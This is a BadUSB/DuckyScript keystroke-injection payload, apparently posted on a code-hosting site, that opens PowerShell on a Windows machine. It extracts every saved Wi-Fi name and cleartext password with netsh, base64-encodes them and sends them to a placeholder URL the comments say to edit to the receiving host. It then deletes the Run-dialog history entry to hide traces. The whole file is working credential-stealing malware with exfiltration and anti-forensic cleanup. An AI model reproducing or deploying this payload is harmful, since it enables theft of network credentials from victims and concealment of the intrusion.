Zarcolio
30 lines
2.5 KiB
Plaintext
30 lines
2.5 KiB
Plaintext
REM _..._ .-'''-. .-'''-.
|
|
REM .-'_..._''. ' _ \ .---. ' _ \
|
|
REM /| .' .' '.\/ /` '. \ | |.--. / /` '. \
|
|
REM || .-. .- / .' . | \ ' | ||__|. | \ '
|
|
REM || \ \ / / .-,.--. . ' | ' | '| |.--.| ' | '
|
|
REM || __ \ \ / / __ | .-. || | \ \ / / | || |\ \ / /
|
|
REM ||/'__ '.\ \ / / .--------. .:--.'. | | | || | `. ` ..' / | || | `. ` ..' /
|
|
REM |:/` '. '\ \ / / |____ | / | \ | | | | |. ' '-...-'` | || | '-...-'`
|
|
REM || | | \ ` / / / `" __ | | | | '- \ '. . | || |
|
|
REM ||\ / ' \ / .' / .'.''| | | | '. `._____.-'/ | ||__|
|
|
REM |/\'..' / / / / /___ / / | |_| | `-.______ / '---'
|
|
REM ' `'-'`|`-' / | |\ \._,\ '/|_| `
|
|
REM '..' |_________| `--' `"
|
|
|
|
REM Steals wifi passwords (uptil win10, win11 needs admin for all passwords)
|
|
REM Exfills it via http://127.0.0.1 (edit this)
|
|
REM Cleans up last opened MRU listing ("powershell")
|
|
REM Press button to close MS Edge.
|
|
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell
|
|
ENTER
|
|
DELAY 1000
|
|
ALTCODE $base64output=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(((netsh wlan show profiles|Select-String "All User Profile\s+:\s+(.+)$"|ForEach-Object{$_.Matches.Groups[1].Value})|ForEach-Object{ "Wifi: $_`r`n";netsh wlan show profile name=$_ key=clear|Select-String "Key Content\s+:\s+(.+)$"|ForEach-Object{"Password: $($_.Matches.Groups[1].Value)`r`n"}})-join ""));Start-Process "microsoft-edge:http://127.0.0.1?secret=$base64output";$HKCU = [Microsoft.Win32.Registry]::CurrentUser; $RunMRU = 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'; $RunMRUKey = $HKCU.OpenSubKey($RunMRU, $true); if ($RunMRUKey -ne $null) { $values = $RunMRUKey.GetValueNames(); if ($values.Length -gt 0) { $lastValue = $values[$values.Length - 1]; $RunMRUKey.DeleteValue($lastValue)}}
|
|
ENTER
|
|
WAIT_FOR_BUTTON_PRESS
|
|
ALT F4
|